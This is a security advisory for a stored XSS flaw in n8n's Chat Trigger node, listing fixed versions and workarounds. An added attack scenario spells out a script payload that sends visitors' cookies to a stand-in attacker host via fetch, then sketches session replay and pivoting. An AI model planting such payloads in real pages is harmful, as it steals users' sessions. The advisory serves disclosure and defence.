GHSA-3c7f-5hgj-h279

## Impact An authenticated user with permission to create or modify workflows could inject malicious JavaScript into the Custom CSS field of the Chat Trigger node. Due to a misconfiguration in the `sanitize-html` library, the sanitization could be bypassed, resulting in stored XSS on the public chat page. Any user visiting the chat URL would be affected. ## Patches The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only. - Disable the Chat Trigger node by adding `@n8n/n8n-nodes-langchain.chatTrigger` to the `NODES_EXCLUDE` environment variable. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

A threat actor with legitimate (or compromised) workflow editor credentials opens an n8n workflow containing a Chat Trigger node and injects <script>fetch('https://c2.attacker.com/x?t='+document.cookie)</script> into the Custom CSS field. The sanitize-html misconfiguration fails to strip the tag. The workflow is saved and published — the payload now lives in the persistent workflow configuration. A customer service agent, external user, or automated integration that opens the public chat URL executes the script automatically, exfiltrating the session token to the attacker. The attacker replays the token to authenticate as that user, accesses the n8n instance or any downstream AI service the chat was proxying (LLM API, RAG knowledge base, CRM integration), and pivots further through the connected workflow toolchain without triggering additional alerts.